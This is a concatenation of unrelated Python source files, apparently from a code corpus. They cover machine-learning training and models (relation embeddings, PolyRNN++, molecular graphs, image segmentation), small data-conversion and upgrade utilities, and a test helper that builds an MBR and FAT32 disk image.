self.loss_weights += [('type_subject_loss', getattr(config, 'type_subject_loss', 0.3)), ('type_object_loss', getattr(config, 'type_object_loss', 0.3))]
self.shared_arg_embeddings = getattr(config, 'shared_arg_embeddings', True)
self.represent_arguments = Embedding(config.n_args, config.d_embed)
self.represent_left_argument = lambda x : self.represent_arguments(x)
self.represent_right_argument = (lambda x : self.represent_arguments(x)) if self.shared_arg_embeddings else Embedding(config.n_args, config.d_embed)
if config.compositional_rels:
self.represent_relations = SpanRepresentation(config, config.d_rels, rel_vocab)
else:
raise NotImplementedError()
if config.relation_predictor == 'multiplication':
self.predict_relations = lambda x, y: x * y
elif config.relation_predictor == 'mlp':
self.predict_relations = MLP(config)
else:
raise Exception('Unknown relation predictor: ' + config.relation_predictor)
self.init()
def to_tensors(self, fields):
return ((field, 1.0 - torch.eq(field, self.pad).float()) if (len(field.size()) > 1 and (self.compositional_rels)) else field for field in fields)
def init(self):
for arg_matrix in [self.represent_arguments, self.represent_right_argument]:
if isinstance(arg_matrix, Embedding):
if self.arg_vocab.vectors is not None:
pretrained = normalize(self.arg_vocab.vectors, dim=-1) if self.normalize_pretrained else self.arg_vocab.vectors
arg_matrix.weight.data[:, :pretrained.size(1)].copy_(pretrained)
print('Copied pretrained vecs for argument matrix')
else:
arg_matrix.reset_parameters()
def forward(self, batch):
if len(batch) == 4:
batch = batch + (None, None)
subjects, objects, observed_relations, sampled_relations, sampled_subjects, sampled_objects = batch
sampled_relations = sampled_relations.view(-1, observed_relations.size(1), 1).squeeze(-1)
subjects, objects = self.to_tensors((subjects, objects))
embedded_subjects = self.represent_left_argument(subjects)
embedded_objects = self.represent_right_argument(objects)
predicted_relations = self.predict_relations(embedded_subjects, embedded_objects)
observed_relations, sampled_relations = self.to_tensors((observed_relations, sampled_relations))
observed_relations = self.represent_relations(observed_relations)
sampled_relations = self.represent_relations(sampled_relations)
# score = lambda predicted, observed : (predicted * observed).sum(-1)
rep_observed_relations = observed_relations.repeat(self.num_sampled_relations, 1)
rep_predicted_relations = predicted_relations.repeat(self.num_sampled_relations, 1)
pos_rel_scores, neg_rel_scores = self.score(predicted_relations, observed_relations), self.score(rep_predicted_relations, sampled_relations)
output_dict = {}
output_dict['positive_loss'] = -logsigmoid(pos_rel_scores).sum()
output_dict['negative_rel_loss'] = -logsigmoid(-neg_rel_scores).sum()
# fake pair loss
if sampled_subjects is not None and sampled_objects is not None:
# sampled_subjects, sampled_objects = self.to_tensors((sampled_subjects, sampled_objects))
sampled_subjects, sampled_objects = sampled_subjects.view(-1, 1).squeeze(-1), sampled_objects.view(-1, 1).squeeze(-1)
sampled_subjects, sampled_objects = self.represent_left_argument(sampled_subjects), self.represent_right_argument(sampled_objects)
rep_embedded_objects, rep_embedded_subjects = embedded_objects.repeat(self.num_neg_samples, 1), embedded_subjects.repeat(self.num_neg_samples, 1)
pred_relations_for_sampled_sub = self.predict_relations(sampled_subjects, rep_embedded_objects)
pred_relations_for_sampled_obj = self.predict_relations(rep_embedded_subjects, sampled_objects)
rep_observed_relations = observed_relations.repeat(self.num_neg_samples, 1)
output_dict['negative_subject_loss'] = -logsigmoid(-self.score(pred_relations_for_sampled_sub, rep_observed_relations)).sum() #/ self.num_neg_samples
output_dict['negative_object_loss'] = -logsigmoid(-self.score(pred_relations_for_sampled_obj, rep_observed_relations)).sum() #/ self.num_neg_samples
if self.type_scores is not None:
# loss_weights += [('type_subject_loss', 0.3), ('type_object_loss', 0.3)]
method = 'uniform'
type_sampled_subjects, type_sampled_objects = self.get_type_sampled_arguments(subjects, method), self.get_type_sampled_arguments(objects, method)
type_sampled_subjects, type_sampled_objects = self.represent_left_argument(type_sampled_subjects), self.represent_right_argument(type_sampled_objects)
pred_relations_for_type_sampled_sub = self.predict_relations(type_sampled_subjects, embedded_objects)
pred_relations_for_type_sampled_obj = self.predict_relations(embedded_subjects, type_sampled_objects)
output_dict['type_subject_loss'] = -logsigmoid(-self.score(pred_relations_for_type_sampled_sub, observed_relations)).sum()
output_dict['type_object_loss'] = -logsigmoid(-self.score(pred_relations_for_type_sampled_obj, observed_relations)).sum()
loss = 0.0
for loss_name, weight in self.loss_weights:
loss += weight * output_dict[loss_name]
output_dict['observed_probabilities'] = sigmoid(pos_rel_scores)
output_dict['sampled_probabilities'] = sigmoid(neg_rel_scores)
return predicted_relations, loss, output_dict
def get_type_sampled_arguments(self, arguments, method='uniform'):
argument_indices = torch.index_select(self.type_indices, 0, arguments.data)
if method == 'unigram':
argument_scores = torch.index_select(self.type_scores, 0, arguments.data)
sampled_idx_idxs = torch.multinomial(argument_scores, 1, replacement=True).squeeze(1).cuda()
sampled_idxs = torch.gather(argument_indices, 1, sampled_idx_idxs.unsqueeze(1)).squeeze(1)
else:
# sampled_idx_idxs = torch.randint(0, self.type_scores.size(1), size=arguments.size(0), replacement=True)
sampled_idx_idxs = torch.LongTensor(arguments.size(0)).random_(0, self.type_scores.size(1)).cuda()
sampled_idxs = torch.gather(argument_indices, 1, sampled_idx_idxs.unsqueeze(1)).squeeze(1)
return Variable(sampled_idxs, requires_grad=False)
def score(self, predicted, observed):
return torch.bmm(predicted.unsqueeze(1), observed.unsqueeze(2)).squeeze(-1).squeeze(-1)
class MLP(Module):
def __init__(self, config):
super(MLP, self).__init__()
self.dropout = Dropout(p=config.dropout)
self.nonlinearity = ReLU()
self.normalize = normalize if getattr(config, 'normalize_args', False) else (lambda x : x)
layers = getattr(config, "mlp_layers", 4)
if layers == 2:
self.mlp = Sequential(self.dropout, Linear(3 * config.d_args, config.d_args), self.nonlinearity, self.dropout, Linear(config.d_args, config.d_rels))
elif layers == 3:
self.mlp = Sequential(self.dropout, Linear(3 * config.d_args, config.d_args), self.nonlinearity, self.dropout, Linear(config.d_args, config.d_args), self.nonlinearity, self.dropout, Linear(config.d_args, config.d_rels))
elif layers == 4:
self.mlp = Sequential(self.dropout, Linear(3 * config.d_args, config.d_args), self.nonlinearity, self.dropout, Linear(config.d_args, config.d_args), self.nonlinearity, self.dropout, Linear(config.d_args, config.d_args), self.nonlinearity, self.dropout, Linear(config.d_args, config.d_rels))
else:
raise NotImplementedError()
def forward(self, subjects, objects):
subjects = self.normalize(subjects)
objects = self.normalize(objects)
return self.mlp(torch.cat([subjects, objects, subjects * objects], dim=-1))
|
116352
|
from __future__ import unicode_literals
from __future__ import absolute_import, division, print_function
"""
Value mapper for Identifier (URI/CURIE) field
"""
__author__ = "<NAME> (<EMAIL>)"
__copyright__ = "Copyright 2017, <NAME>"
__license__ = "MIT (http://opensource.org/licenses/MIT)"
import logging
log = logging.getLogger(__name__)
from utils.py3porting import is_string, to_unicode
from annalist.views.fields.render_base import RenderBase
# ----------------------------------------------------------------------------
#
# Identifier value mapping
#
# ----------------------------------------------------------------------------
class IdentifierValueMapper(RenderBase):
"""
Value mapper class for entity id field.
"""
@classmethod
def decode(cls, field_value):
"""
Returns an Identifier (URI/CURIE) form field value with leading/trailing spaces trimmed
"""
if is_string(field_value):
field_value = field_value.strip()
return field_value
# encode defaults to identity mapper]
# End.
|
116398
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import json
import os
import argparse
import numpy as np
import torch.optim as optim
import torch.nn as nn
from torch.utils.data import DataLoader
from datetime import datetime
from collections import defaultdict
from tensorboardX import SummaryWriter
from skimage.transform import pyramid_expand
from tqdm import tqdm
from Utils import utils
from DataProvider import cityscapes
from Models.Poly import polyrnnpp
from Evaluation import losses, metrics
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--exp', type=str)
parser.add_argument('--resume', type=str)
args = parser.parse_args()
return args
def get_data_loaders(opts, DataProvider):
print 'Building dataloaders'
dataset_train = DataProvider(split='train', opts=opts['train'])
dataset_val = DataProvider(split='train_val', opts=opts['train_val'])
train_loader = DataLoader(dataset_train, batch_size=opts['train']['batch_size'],
shuffle=False, num_workers=opts['train']['num_workers'], collate_fn=cityscapes.collate_fn)
val_loader = DataLoader(dataset_val, batch_size=opts['train_val']['batch_size'],
shuffle=False, num_workers=opts['train_val']['num_workers'], collate_fn=cityscapes.collate_fn)
return train_loader, val_loader
class Trainer(object):
def __init__(self, args):
self.global_step = 0
self.epoch = 0
self.opts = json.load(open(args.exp, 'r'))
utils.create_folder(os.path.join(self.opts['exp_dir'], 'checkpoints'))
# Copy experiment file
os.system('cp %s %s' % (args.exp, self.opts['exp_dir']))
self.writer = SummaryWriter(os.path.join(self.opts['exp_dir'], 'logs', 'train'))
self.val_writer = SummaryWriter(os.path.join(self.opts['exp_dir'], 'logs', 'train_val'))
self.train_loader, self.val_loader = get_data_loaders(self.opts['dataset'], cityscapes.DataProvider)
self.model = polyrnnpp.PolyRNNpp(self.opts).to(device)
if 'xe_initializer' in self.opts.keys():
self.model.reload(self.opts['xe_initializer'])
elif 'encoder_reload' in self.opts.keys():
self.model.encoder.reload(self.opts['encoder_reload'])
# set
self.model.encoder.eval()
self.model.first_v.eval()
self.model.evaluator.eval()
# OPTIMIZER
no_wd = []
wd = []
print 'Weight Decay applied to: '
for name, p in self.model.named_parameters():
if not p.requires_grad:
# No optimization for frozen params
continue
if 'bn' in name or 'conv_lstm' in name or 'bias' in name:
no_wd.append(p)
else:
wd.append(p)
print name,
# Allow individual options
self.optimizer = optim.Adam(
[
{'params': no_wd, 'weight_decay': 0.0},
{'params': wd}
],
lr=self.opts['lr'],
weight_decay=self.opts['weight_decay'],
amsgrad=False)
# TODO: Test how amsgrad works (On the convergence of Adam and Beyond)
self.lr_decay = optim.lr_scheduler.StepLR(self.optimizer, step_size=self.opts['lr_decay'],
gamma=0.1)
if args.resume is not None:
self.resume(args.resume)
def save_checkpoint(self, epoch):
save_state = {
'epoch': epoch,
'global_step': self.global_step,
'state_dict': self.model.state_dict(),
'optimizer': self.optimizer.state_dict(),
'lr_decay': self.lr_decay.state_dict()
}
save_name = os.path.join(self.opts['exp_dir'], 'checkpoints', 'epoch%d_step%d.pth' \
% (epoch, self.global_step))
torch.save(save_state, save_name)
print 'Saved model'
def resume(self, path):
self.model.reload(path)
save_state = torch.load(path, map_location=lambda storage, loc: storage)
self.global_step = save_state['global_step']
self.epoch = save_state['epoch']
self.optimizer.load_state_dict(save_state['optimizer'])
self.lr_decay.load_state_dict(save_state['lr_decay'])
def loop(self):
for epoch in range(self.epoch, self.opts['max_epochs']):
self.save_checkpoint(epoch)
self.lr_decay.step()
print 'LR is now: ', self.optimizer.param_groups[0]['lr']
self.train(epoch)
def train(self, epoch):
print 'Starting training'
self.model.temperature = self.opts['temperature']
self.model.ggnn.encoder.train()
accum = defaultdict(float)
# To accumulate stats for printing
ggnn_grid_size = self.opts['ggnn_grid_size']
for step, data in enumerate(self.train_loader):
self.optimizer.zero_grad()
if self.global_step % self.opts['val_freq'] == 0:
self.validate()
self.save_checkpoint(epoch)
output = self.model(data['img'].to(device), data['fwd_poly'].to(device), orig_poly=data['orig_poly'])
ggnn_logits = output['ggnn_logits']
local_prediction = output['ggnn_local_prediction'].to(device)
poly_masks = output['ggnn_mask'].to(device)
pred_polys = output['pred_polys'].data.numpy()
loss_sum = losses.poly_vertex_loss_mle_ggnn(local_prediction,
poly_masks,
ggnn_logits)
loss_sum.backward()
if 'grad_clip' in self.opts.keys():
nn.utils.clip_grad_norm_(self.model.ggnn.parameters(), self.opts['grad_clip'])
self.optimizer.step()
with torch.no_grad():
# Get IoU
iou = 0
orig_poly = data['orig_poly']
for i in range(pred_polys.shape[0]):
p = pred_polys[i]
mask_poly = utils.get_masked_poly(p, self.model.ggnn.ggnn_grid_size)
mask_poly = utils.class_to_xy(mask_poly, self.model.ggnn.ggnn_grid_size)
curr_gt_poly_112 = utils.poly01_to_poly0g(orig_poly[i], ggnn_grid_size)
cur_iou, masks = metrics.iou_from_poly(np.array(mask_poly, dtype=np.int32),
np.array(curr_gt_poly_112, dtype=np.int32),
ggnn_grid_size,
ggnn_grid_size)
iou += cur_iou
iou = iou / pred_polys.shape[0]
accum['loss'] += float(loss_sum.item())
accum['iou'] += iou
accum['length'] += 1
if step % self.opts['print_freq'] == 0:
# Mean of accumulated values
for k in accum.keys():
if k == 'length':
continue
accum[k] /= accum['length']
# Add summaries
masks = np.expand_dims(masks, -1).astype(np.uint8) # Add a channel dimension
masks = np.tile(masks, [1, 1, 1, 3]) # Make [2, H, W, 3]
img = (data['img'].cpu().numpy()[-1, ...] * 255).astype(np.uint8)
img = np.transpose(img, [1, 2, 0]) # Make [H, W, 3]
self.writer.add_image('pred_mask', masks[0], self.global_step)
self.writer.add_image('gt_mask', masks[1], self.global_step)
self.writer.add_image('image', img, self.global_step)
for k in accum.keys():
if k == 'length':
continue
self.writer.add_scalar(k, accum[k], self.global_step)
print(
"[%s] Epoch: %d, Step: %d, Polygon Loss: %f, IOU: %f" \
% (str(datetime.now()), epoch, self.global_step, accum['loss'], accum['iou']))
accum = defaultdict(float)
del (output, local_prediction, poly_masks, masks, ggnn_logits, pred_polys, loss_sum)
self.global_step += 1
def validate(self):
print 'Validating'
ggnn_grid_size = self.opts['ggnn_grid_size']
self.model.ggnn.encoder.eval()
self.model.temperature = 0
self.model.mode = "test"
# Leave LSTM in train mode
with torch.no_grad():
ious = []
for step, data in enumerate(tqdm(self.val_loader)):
output = self.model(data['img'].to(device), data['fwd_poly'].to(device))
pred_polys = output['pred_polys'].data.numpy()
# Get IoU
iou = 0
orig_poly = data['orig_poly']
for i in range(pred_polys.shape[0]):
p = pred_polys[i]
mask_poly = utils.get_masked_poly(p, self.model.ggnn.ggnn_grid_size)
mask_poly = utils.class_to_xy(mask_poly, self.model.ggnn.ggnn_grid_size)
curr_gt_poly_112 = utils.poly01_to_poly0g(orig_poly[i], ggnn_grid_size)
i, masks = metrics.iou_from_poly(np.array(mask_poly, dtype=np.int32),
np.array(curr_gt_poly_112, dtype=np.int32), ggnn_grid_size, ggnn_grid_size)
iou += i
iou = iou / pred_polys.shape[0]
ious.append(iou)
del (output)
del (pred_polys)
iou = np.mean(ious)
self.val_writer.add_scalar('iou', float(iou), self.global_step)
print '[VAL] IoU: %f' % iou
self.model.temperature = self.opts['temperature']
self.model.mode = "train_ggnn"
self.model.ggnn.encoder.train()
if __name__ == '__main__':
args = get_args()
trainer = Trainer(args)
trainer.loop()
|
116426
|
import nltk
from operator import itemgetter
class Argument:
def __init__(self, arg):
self.words = [x for x in arg[0].strip().split(' ') if x]
self.posTags = list(map(itemgetter(1), nltk.pos_tag(self.words)))
self.indices = arg[1]
self.feats = {}
COREF = 'coref'
itemgetter
|
116456
|
from dataclasses import dataclass
from typing import Tuple, List
import ase.data
import numpy as np
from networkx import Graph
from rdkit import Chem
import graphdg.parse.tools as tools
from graphdg.parse.extended_graph import mol_to_extended_graph
from graphdg.tools import GLOBALS, NODES, EDGES, SENDERS, RECEIVERS, to_one_hot
# Elements
SYMBOLS = ase.data.chemical_symbols[1:10]
SYMBOL_TO_OH = {symbol: to_one_hot(index=index, num_classes=len(SYMBOLS)) for index, symbol in enumerate(SYMBOLS)}
# Rings
MAX_RING_SIZE = 9
RING_SIZES = range(3, MAX_RING_SIZE + 1)
NOT_IN_RING = tuple(0 for _ in RING_SIZES)
# Edges
EDGE_KINDS = [1, 2, 3]
EDGE_KIND_TO_OH = {
edge_kind: to_one_hot(index=index, num_classes=len(EDGE_KINDS))
for index, edge_kind in enumerate(EDGE_KINDS)
}
# Bond type
BOND_TYPES = [
Chem.BondType.ZERO, Chem.BondType.SINGLE, Chem.BondType.DOUBLE, Chem.BondType.TRIPLE, Chem.BondType.AROMATIC
]
BOND_TYPE_TO_OH = {
bond_type: to_one_hot(index=index, num_classes=len(BOND_TYPES))
for index, bond_type in enumerate(BOND_TYPES)
}
# Stereo
STEREO_TYPES = [Chem.BondStereo.STEREONONE, Chem.BondStereo.STEREOANY, Chem.BondStereo.STEREOE, Chem.BondStereo.STEREOZ]
STEREO_TYPE_TO_OH = {
stereo_type: to_one_hot(index=index, num_classes=len(STEREO_TYPES))
for index, stereo_type in enumerate(STEREO_TYPES)
}
# Chirality
CHI_TAGS = [Chem.CHI_UNSPECIFIED, Chem.CHI_TETRAHEDRAL_CW, Chem.CHI_TETRAHEDRAL_CCW]
CHI_TAGS_TO_OH = {chi_tag: to_one_hot(index=index, num_classes=len(CHI_TAGS)) for index, chi_tag in enumerate(CHI_TAGS)}
@dataclass
class NodeInfo:
symbol: str
chiral_tag: int
def to_features(self) -> List:
return SYMBOL_TO_OH[self.symbol] + CHI_TAGS_TO_OH[self.chiral_tag]
@dataclass
class EdgeInfo:
distance: float
atom_ids: Tuple[int, int]
kind: int
stereo: int = Chem.BondStereo.STEREONONE
bond_type: int = Chem.BondType.ZERO
is_aromatic: bool = False
is_conjugated: bool = False
is_in_ring_size: Tuple[int, ...] = NOT_IN_RING
def to_features(self) -> Tuple[Tuple, List[int], float]:
feats = EDGE_KIND_TO_OH[self.kind] + STEREO_TYPE_TO_OH[self.stereo] + BOND_TYPE_TO_OH[self.bond_type] + [
int(self.is_aromatic), int(self.is_conjugated)
] + list(self.is_in_ring_size)
return self.atom_ids, feats, self.distance
def get_node_infos(molecule: Chem.Mol) -> List[NodeInfo]:
return [
NodeInfo(
symbol=ase.data.chemical_symbols[atom.GetAtomicNum()],
chiral_tag=atom.GetChiralTag(),
) for atom in molecule.GetAtoms()
]
def get_edge_infos(molecule: Chem.Mol, graph: Graph):
edge_infos = []
for (source, sink) in graph.edges:
kind = graph.edges[(source, sink)]['kind']
if kind == 1:
bond = molecule.GetBondBetweenAtoms(source, sink)
edge_info = EdgeInfo(
distance=tools.get_atom_distance(molecule, source, sink),
atom_ids=(source, sink),
kind=kind,
stereo=bond.GetStereo(),
bond_type=bond.GetBondType(),
is_aromatic=bond.GetIsAromatic(),
is_conjugated=bond.GetIsConjugated(),
is_in_ring_size=tuple(int(bond.IsInRingSize(size)) for size in RING_SIZES),
)
else:
edge_info = EdgeInfo(
distance=tools.get_atom_distance(molecule, source, sink),
atom_ids=(source, sink),
kind=kind,
)
edge_infos.append(edge_info)
return edge_infos
def get_feats_and_targets(node_infos: List[NodeInfo], edge_infos: List[EdgeInfo]) -> Tuple[dict, np.ndarray]:
nodes = [node_info.to_features() for node_info in node_infos]
edges = []
senders = []
receivers = []
targets = []
for edge_info in edge_infos:
(sender, receiver), edge_feats, distance = edge_info.to_features()
# Forward
edges.append(edge_feats)
senders.append(sender)
receivers.append(receiver)
targets.append([distance])
# Reverse
edges.append(edge_feats)
senders.append(receiver)
receivers.append(sender)
targets.append([distance])
assert (len(edges) == len(senders) == len(receivers) == len(targets))
feats = {
GLOBALS: np.array([], dtype=np.float),
NODES: np.array(nodes, dtype=np.float),
EDGES: np.array(edges, dtype=np.float),
SENDERS: np.array(senders, dtype=np.int),
RECEIVERS: np.array(receivers, dtype=np.int),
}
targets = np.array(targets, dtype=np.float)
return feats, targets
def get_info_tuple(molecule: Chem.Mol, seed: int) -> Tuple[List[NodeInfo], List[EdgeInfo]]:
atom_infos = get_node_infos(molecule)
graph = mol_to_extended_graph(molecule, seed=seed)
edge_infos = get_edge_infos(molecule=molecule, graph=graph)
return atom_infos, edge_infos
def get_dataset(molecules: List[Chem.Mol], seed: int, count: int) -> List[Tuple[dict, np.ndarray]]:
dataset = []
for mol_id, molecule in enumerate(molecules):
for index in range(count):
node_infos, edge_infos = get_info_tuple(molecule, seed=seed + mol_id + index)
feats_targets = get_feats_and_targets(node_infos=node_infos, edge_infos=edge_infos)
dataset.append(feats_targets)
return dataset
|
116489
|
from zisan.Seg.Interface import ImgSeg, markTools
import os
import numpy as np
import cv2
from PIL import Image
current_path = os.path.dirname(__file__)
lines=[[(281,120),(267,341)],[(279,157),(208,171)],[(309,170),(308,250)],[(275,233),(370,341)]]
model=ImgSeg(current_path+'/Jintu_SEG_Interactive.pth')
img=Image.open(current_path+'/temp/1.jpg').convert('RGB')
markpen=markTools(img.height,img.width)
for line in lines:
markpen.curveDraw(line,is_Pos=True)
re=markpen.getMark_result(is_showPreview=True)
model.ImgSeg_SingleObj(img,re,is_showPreview=True)
|
116504
|
import uuid
import os
def unique_upload(instance, filename):
ext = filename.split('.').pop()
return "{}.{}".format(uuid.uuid4(), ext)
|
116507
|
import argparse
from pathlib import Path
import shutil
from sphfile import SPHFile
parser = argparse.ArgumentParser()
parser.add_argument("src_dir")
parser.add_argument("dest_dir")
args = parser.parse_args()
src = Path(args.src_dir)
dest = Path(args.dest_dir)
for file_sph in (src / "sph").iterdir():
file_stm = src / "stm" / file_sph.name.replace(".sph", ".stm")
dest.mkdir(parents=True, exist_ok=True)
sph = SPHFile(str(file_sph))
sph.write_wav(str(dest / file_sph.name.replace(".sph", ".wav")))
with open(file_stm, "r") as f:
output = []
ground_truth = []
for line in f.readlines():
line_parts = line.split()
line = " ".join(line_parts[6:])
if line != "ignore_time_segment_in_scoring":
output.append(line)
ground_truth.append(" ".join([line_parts[3], line_parts[4]] + line_parts[6:]))
with open(str(dest / file_sph.name.replace(".sph", ".txt")), "w") as f:
f.write("\n".join(output))
with open(str(dest / file_sph.name.replace(".sph", "_ground_truth.txt")), "w") as f:
f.write("\n".join(ground_truth))
|
116515
|
from snovault import (
upgrade_step,
)
@upgrade_step('workflow_run_awsem', '1', '2')
@upgrade_step('workflow_run_sbg', '1', '2')
@upgrade_step('workflow_run', '1', '2')
def workflow_run_1_2(value, system):
'''Change input_files.format_if_extra to FileFormat'''
formats = system['registry']['collections']['FileFormat']
input_files = value.get('input_files', [])
for i, infile in enumerate(input_files):
if 'format_if_extra' not in infile:
continue
eformat_item = formats.get(infile['format_if_extra'])
efuuid = None
try:
efuuid = str(eformat_item.uuid)
except AttributeError:
pass
if not efuuid:
msg = 'EXTRA_FILE_FORMAT: %s NOT FOUND' % infile['format_if_extra']
note = value['input_files'][i].get('notes', '')
msg = ' '.join([note, msg])
value['input_files'][i]['notes'] = msg
del value['input_files'][i]['format_if_extra']
else:
value['input_files'][i]['format_if_extra'] = efuuid
@upgrade_step('workflow_run_awsem', '2', '3')
@upgrade_step('workflow_run_sbg', '2', '3')
@upgrade_step('workflow_run', '2', '3')
def workflow_run_2_3(value, system):
if 'output_quality_metrics' in value:
del value['output_quality_metrics']
|
116544
|
import os
import time
import logging
import unittest
import binascii
import contextlib
import dissect.formats.mbr as mbr
import dissect.formats.fat32 as fat32
TEST_IMAGE_PATH = "test.dd"
KILOBYTE = 1024
MEGABYTE = 1024 * KILOBYTE
GIGABYTE = 1024 * MEGABYTE
TERABYTE = 1024 * GIGABYTE
TEST_IMAGE_SIZE = 40 * MEGABYTE
TEST_PART_SIZE = 32 * MEGABYTE
MIN_FS_SIZE = 32 * MEGABYTE
# default linux no boot code
# prints something like, "this volume cannot be booted"
NOBOOT_CODE = bytes(binascii.unhexlify(b"""
0E 1F BE 77 7C AC
22 C0 74 0B 56 B4 0E BB 07 00 CD 10 5E EB F0 32
E4 CD 16 CD 19 EB FE 54 68 69 73 20 69 73 20 6E
6F 74 20 61 20 62 6F 6F 74 61 62 6C 65 20 64 69
73 6B 2E 20 20 50 6C 65 61 73 65 20 69 6E 73 65
72 74 20 61 20 62 6F 6F 74 61 62 6C 65 20 66 6C
6F 70 70 79 20 61 6E 64 0D 0A 70 72 65 73 73 20
61 6E 79 20 6B 65 79 20 74 6F 20 74 72 79 20 61
67 61 69 6E 20 2E 2E 2E 20 0D 0A""".lstrip(b"\x00").rstrip().replace(b" ", b"").replace(b"\n", b"")))
def set_first_partition_fat32(path, size):
with mbr.MBR(path) as m :
for i, _ in m.Partitions:
part_entry = m.Partitions[i]
if part_entry.TotalSectors != 0 or part_entry.RelativeSector != 0:
raise RuntimeError("cannot update existing partition table with existing partitions")
size_in_sectors = size // mbr.SECTOR_SIZE
part_entry = m.Partitions[0]
part_entry.BootIndicator = mbr.BOOTINDICATOR.NOBOOT
# for CHS, can use zero, and for LBA mode
# via: https://en.wikipedia.org/wiki/Master_boot_record
part_entry.StartingHead = 0x0
part_entry.StartingSectCylinder = 0x0
part_entry.SystemID = mbr.SYSTEMID.PRI_FAT32_INT13
part_entry.EndingHead = 0x0
part_entry.EndingSectCylinder = 0x0
part_entry.RelativeSector = 2048
part_entry.TotalSectors = size_in_sectors
m.EndOfSectorMarker = 0xAA55
def create_fat32_filesystem(path, partition_offset, size):
if size < MIN_FS_SIZE:
raise RuntimeError("min FAT32 file system size is 32MB (with 512 byte sectors)")
fs = fat32.FAT32(True)
with open(path, "r+b") as f:
fs.vsLoad(f, partition_offset, writeback=True)
fs.bpb.BPB_jmpBoot = b"\xEB\x58\x90"
fs.bpb.BPB_OEMName = b"mkfs.fat"
fs.bpb.BPB_BytsPerSec = mbr.SECTOR_SIZE
# via: https://support.microsoft.com/en-us/kb/140365
if size < 64 * MEGABYTE:
fs.bpb.BPB_SecPerClus = 512 // mbr.SECTOR_SIZE
elif 64 * MEGABYTE <= size < 128 * MEGABYTE:
fs.bpb.BPB_SecPerClus = 1024 // mbr.SECTOR_SIZE
elif 128 * MEGABYTE <= size < 256 * MEGABYTE:
fs.bpb.BPB_SecPerClus = 2048 // mbr.SECTOR_SIZE
elif 256 * MEGABYTE <= size < 8 * GIGABYTE:
fs.bpb.BPB_SecPerClus = 4096 // mbr.SECTOR_SIZE
elif 8 * GIGABYTE <= size < 16 * GIGABYTE:
fs.bpb.BPB_SecPerClus = 8192 // mbr.SECTOR_SIZE
elif 16 * GIGABYTE <= size < 32 * GIGABYTE:
fs.bpb.BPB_SecPerClus = 16384 // mbr.SECTOR_SIZE
else:
raise RuntimeError("file system size greater than 2TB not supported")
fs.bpb.BPB_RsvdSecCnt = 32 # from Linux example
fs.bpb.BPB_NumFATs = 2
fs.bpb.BPB_RootEntCnt = 0
total_sector_count = size // mbr.SECTOR_SIZE
if total_sector_count < 0xFFFF:
fs.bpb.BPB_TotSec16 = total_sector_count
fs.bpb.BPB_TotSec32 = 0
else:
fs.bpb.BPB_TotSec16 = 0
fs.bpb.BPB_TotSec32 = total_sector_count
fs.bpb.BPB_Media = 248 # from Linux example
fs.bpb.BPB_FATSz16 = 0
# for CHS, can use zero, and for LBA mode
# via: https://en.wikipedia.org/wiki/Master_boot_record
fs.bpb.BPB_SecPerTrk = 0
fs.bpb.BPB_NumHeads = 0
fs.bpb.BPB_HiddSec = 0
total_cluster_count = total_sector_count // fs.bpb.BPB_SecPerClus
fs.bpb.BPB_FATSz32 = (4 * total_cluster_count) // mbr.SECTOR_SIZE
fs.bpb.BPB_ExtFlags = 0
fs.bpb.BPB_FSVer = 0
fs.bpb.BPB_RootClus = 2
fs.bpb.BPB_FSInfo = 1
fs.bpb.BPB_BkBootSec = 6
fs.bpb.BPB_DrvNum = 128 # from Linux example
fs.bpb.BPB_Reserved1 = 0
fs.bpb.BPB_BootSig = 41
fs.bpb.BPB_VolID = 4107516940 # from Linux example
fs.bpb.BPB_VolLab = b"NO NAME "
fs.bpb.BPB_FilSysType = b"FAT32 "
fs.bpb.BPB_BootCode = NOBOOT_CODE
fs.bpb.EndOfSectorMarker = 0xAA55
# the the FS is first parsed, it may not create structures for the
# backup BPB, FS info, or FATs, since they're not referenced in a NULL primary BPB.
# so, we reload the FS using the initial BPB set just above.
with open(path, "r+b") as f:
fs.vsLoad(f, partition_offset, writeback=True)
fs.bpb_backup.BPB_jmpBoot = fs.bpb.BPB_jmpBoot
fs.bpb_backup.BPB_OEMName = fs.bpb.BPB_OEMName
fs.bpb_backup.BPB_BytsPerSec = fs.bpb.BPB_BytsPerSec
fs.bpb_backup.BPB_SecPerClus = fs.bpb.BPB_SecPerClus
fs.bpb_backup.BPB_RsvdSecCnt = fs.bpb.BPB_RsvdSecCnt
fs.bpb_backup.BPB_NumFATs = fs.bpb.BPB_NumFATs
fs.bpb_backup.BPB_RootEntCnt = fs.bpb.BPB_RootEntCnt
fs.bpb_backup.BPB_TotSec16 = fs.bpb.BPB_TotSec16
fs.bpb_backup.BPB_TotSec32 = fs.bpb.BPB_TotSec32
fs.bpb_backup.BPB_Media = fs.bpb.BPB_Media
fs.bpb_backup.BPB_FATSz16 = fs.bpb.BPB_FATSz16
fs.bpb_backup.BPB_SecPerTrk = fs.bpb.BPB_SecPerTrk
fs.bpb_backup.BPB_NumHeads = fs.bpb.BPB_NumHeads
fs.bpb_backup.BPB_HiddSec = fs.bpb.BPB_HiddSec
fs.bpb_backup.BPB_FATSz32 = fs.bpb.BPB_FATSz32
fs.bpb_backup.BPB_ExtFlags = fs.bpb.BPB_ExtFlags
fs.bpb_backup.BPB_FSVer = fs.bpb.BPB_FSVer
fs.bpb_backup.BPB_RootClus = fs.bpb.BPB_RootClus
fs.bpb_backup.BPB_FSInfo = fs.bpb.BPB_FSInfo
fs.bpb_backup.BPB_BkBootSec = fs.bpb.BPB_BkBootSec
fs.bpb_backup.BPB_DrvNum = fs.bpb.BPB_DrvNum
fs.bpb_backup.BPB_Reserved1 = fs.bpb.BPB_Reserved1
fs.bpb_backup.BPB_BootSig = fs.bpb.BPB_BootSig
fs.bpb_backup.BPB_VolID = fs.bpb.BPB_VolID
fs.bpb_backup.BPB_VolLab = fs.bpb.BPB_VolLab
fs.bpb_backup.BPB_FilSysType = fs.bpb.BPB_FilSysType
fs.bpb_backup.BPB_BootCode = fs.bpb.BPB_BootCode
fs.bpb_backup.EndOfSectorMarker = fs.bpb.EndOfSectorMarker
for f in fs.getFats():
f[0] = 0x0FFFFFF8 # from Linux sample
f[1] = 0x0FFFFFFF
# set root dir cluster chain
f[2] = fat32.CLUSTER_TYPES.LAST
fs.fs_info.FSI_LeadSig = 0x41615252
fs.fs_info.FSI_StrucSig = 0x61417272
fs.fs_info.FSI_TailSig = 0xAA550000
@contextlib.contextmanager
def test_image():
try:
os.remove(TEST_IMAGE_PATH)
